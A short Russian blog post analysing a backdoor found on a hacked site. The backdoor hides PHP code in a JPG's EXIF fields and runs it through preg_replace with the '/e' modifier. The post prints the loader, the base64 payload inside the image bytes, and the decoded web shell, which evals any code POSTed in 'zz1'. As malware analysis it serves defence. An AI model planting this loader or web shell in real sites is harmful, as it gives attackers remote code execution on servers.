бекдор в JPG

На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для считывания служебных данных EXIF из файла JPG, а вторая функция запускает программу.

<?php
$exif = exif_read_data('тут_полный_адрес_до_картинки_от_корня_сервера.jpg');
preg_replace($exif['Make'],$exif['Model'],'');
?>

В файле картинки

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@
^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));

Заголовок Make содержит параметр «/.*/e». В PHP-функции preg_replace параметр /e используется для исполнения передаваемого ему кода. В то же время заголовок Model содержит непосредственно сам код.
Если расшифровать текст, закодированный в base64, то мы увидим следующее.

if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}

То есть бэкдор готов запустить на исполнение любой контент, полученный в POST-запросе через переменную zz1.

Скажите свое мнение

ваш email не публикуется. обязательно *

;-) :yawn: :whew: :toivo: :tmi: :time: :thinking: :talking: :sweating: :swear: :sun: :star: :smoke: :smirk: :sleepy: :skype: :shock: :shake: :rofl: :rain: :punch: :puke: :poolparty: :pizza: :phone: :party: :oops: :nod: :no: :ninja: :neutral: :nerd: :music: :muscle: :mrgreen: :movie: :mooning: :mmm: :middlefinger: :makeup: :mail: :mad: :lol: :lipssealed: :kiss: :itwashtme: :inlove: :idea: :hi: :heidy: :heart: :headbang: :happy: :handshake: :giggle: :fubar: :flower: :evilgrin: :emo: :dull: :drunk: :drink: :doh: :devil: :dance: :cry: :cool: :coffie: :clapping: :cash: :call: :cake: :bug: :brokenheart: :bow: :blush: :beer: :bear: :bandit: :arrow: :angry: :angel: :^) :???: :?: :-| :-o :-P :-D :-) :-( :!:

 

*

code

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.